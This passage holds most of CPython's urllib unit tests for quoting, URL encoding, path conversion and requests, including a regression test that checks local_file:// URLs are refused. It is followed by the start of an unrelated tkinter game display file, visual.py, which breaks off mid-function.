self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
def test_local_file_open(self):
# bpo-35907, CVE-2019-9948: urllib must reject local_file:// scheme
class DummyURLopener(urllib.request.URLopener):
def open_local_file(self, url):
return url
with warnings.catch_warnings(record=True):
warnings.simplefilter("ignore", DeprecationWarning)
for url in ('local_file://example', 'local-file://example'):
self.assertRaises(OSError, urllib.request.urlopen, url)
self.assertRaises(OSError, urllib.request.URLopener().open, url)
self.assertRaises(OSError, urllib.request.URLopener().retrieve, url)
self.assertRaises(OSError, DummyURLopener().open, url)
self.assertRaises(OSError, DummyURLopener().retrieve, url)
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
visual.py
|
from threading import Condition, Thread
from time import sleep
from tkinter import Tk, Canvas, Frame, BOTH, TclError, font
from adversary import RandomAdversary
from arguments import parser
from board import Board, Direction, Rotation, Action, Shape
from constants import BOARD_HEIGHT, BOARD_WIDTH, DEFAULT_SEED, INTERVAL, \
BLOCK_LIMIT
from exceptions import BlockLimitException
from player import SelectedPlayer, Player
DRAW_INTERVAL = 100
class Visual(Frame):
board = None
canvas = None
discards = None
bombs = None
score = None
CELL_SIZE = 20
def __init__(self, board):
super().__init__()
self.board = board
self.master.geometry(
f'{(BOARD_WIDTH+6)*self.CELL_SIZE}x' +
f'{BOARD_HEIGHT*self.CELL_SIZE}'
)
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, bg="black")
self.canvas.pack(fill=BOTH, expand=1)
self.after(DRAW_INTERVAL, self.draw)
self.focus_set()
self.bind("<Escape>", self.quit)
self.bind("q", self.quit)
self.bind("Control-c", self.quit)
GREY = '#1e1e1e'
for i in range(0,10,2):
self.canvas.create_rectangle(i * self.CELL_SIZE, 0, (i+1)*self.CELL_SIZE,
BOARD_HEIGHT * self.CELL_SIZE, fill=GREY)
try:
self.font = font.nametofont("Helvetica")
except:
self.font = font.nametofont("TkDefaultFont")
# No easy way to predict what font we'll get - it differs
# depending on the environment, so we'll just scale it until
# it's large enough. This is ugly.
size = 10
width = 0
while width < 90:
size += 1
self.font.configure(size=size)
testtxt = self.canvas.create_text(0,-100, text="DISCARDS", font = self.font)
bounds = self.canvas.bbox(testtxt)
width = bounds[2] - bounds[0]
self.canvas.delete(testtxt)
self.scorefont = font.nametofont("TkFixedFont")
size = 10
width = 0
while width < 100:
size += 1
self.scorefont.configure(size=size)
testtxt = self.canvas.create_text(0,-100, text="88888", font = self.scorefont)
bounds = self.canvas.bbox(testtxt)
width = bounds[2] - bounds[0]
self.canvas.delete(testtxt)
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE, 0,
text="SCORE", font=self.font, anchor="n",
fill="white")
self.scoretext = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE-5,
text=str(self.board.score),
font=self.scorefont, anchor="n",
fill="white", tag="score")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*3,
text="NEXT", font=self.font, anchor="n",
fill="white")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*9,
text="BOMBS", font=self.font, anchor="n",
fill="white")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*12,
text="DISCARDS", font=self.font, anchor="n",
fill="white")
def update_score(self):
if self.board.score == self.score:
return
self.score = self.board.score
self.canvas.itemconfig(self.scoretext, text=str(self.board.score))
self.master.title(f'Score: {self.board.score}')
def quit(self, event):
raise SystemExit
def draw_cell(self, x, y, color, shape):
if shape is Shape.B:
self.canvas.create_oval(
x * self.CELL_SIZE, y * self.CELL_SIZE,
(x+1) * self.CELL_SIZE, (y+1) * self.CELL_SIZE,
fill="white", tag="block")
else:
# tkinter's idea of green is rather dark
if color == 'green':
color = 'green2'
self.canvas.create_rectangle(
x * self.CELL_SIZE, y * self.CELL_SIZE,
(x+1) * self.CELL_SIZE, (y+1) * self.CELL_SIZE,
fill=color, outline="white", tag="block")
def draw_discard(self, x, y):
x = x * self.CELL_SIZE
y = y * self.CELL_SIZE
self.canvas.create_line(x, y, x+self.CELL_SIZE, y+self.CELL_SIZE,
fill="red", width=3, tag="discard")
self.canvas.create_line(x, y+self.CELL_SIZE, x+self.CELL_SIZE, y,
fill="red", width=3, tag="discard")
def update_discards(self):
if self.board.discards_remaining == self.discards:
# don't redraw if the discards are unchanged
return
self.discards = self.board.discards_remaining
self.canvas.delete("discard")
for i in range(self.board.discards_remaining):
self.draw_discard(BOARD_WIDTH + 0.25 + (i%5)*1.1,13+(i//5)*1.1)
def draw(self):
with self.board.lock:
self.canvas.delete("block")
self.update_score()
self.update_discards()
# Add the cells already on the board for drawing.
for (x, y) in self.board:
self.draw_cell(x, y, self.board.cellcolor[x, y], Shape.O)
if self.board.falling is not None:
# Add the cells of the falling block for drawing.
for (x, y) in self.board.falling:
self.draw_cell(x, y, self.board.falling.color,
self.board.falling.shape)
if self.board.next is not None:
# Add the cells of the next block for drawing.
width = self.board.next.right - self.board.next.left
for (x, y) in self.board.next:
self.draw_cell(x + BOARD_WIDTH + 2.5 - width/2, y+4,
self.board.next.color,
self.board.next.shape)
for i in range(self.board.bombs_remaining):
self.draw_cell(BOARD_WIDTH + 0.25 + i*1.1,10, "white", Shape.B)
x = BOARD_WIDTH * self.CELL_SIZE + 1
y = BOARD_HEIGHT * self.CELL_SIZE
self.canvas.create_line(x, 0, x, y, fill='blue')
self.after(DRAW_INTERVAL, self.draw)
class UserPlayer(Player):
has_move = None
target = None
next_move = None
def __init__(self, target):
self.has_move = Condition()
self.target = target
target.focus_set()
target.bind("<Up>", self.key)
target.bind("<Right>", self.key)
target.bind("<Down>", self.key)
target.bind("<Left>", self.key)
target.bind("<space>", self.key)
target.bind("z", self.key)
target.bind("x", self.key)
target.bind("b", self.key)
target.bind("d", self.key)
target.after(INTERVAL, self.drop)
def key(self, event):
with self.has_move:
if event.keysym == 'Up':
self.next_move = Rotation.Clockwise
elif event.keysym == 'Right':
self.next_move = Direction.Right
elif event.keysym == 'Down':
self.next_move = Direction.Down
elif event.keysym == 'Left':
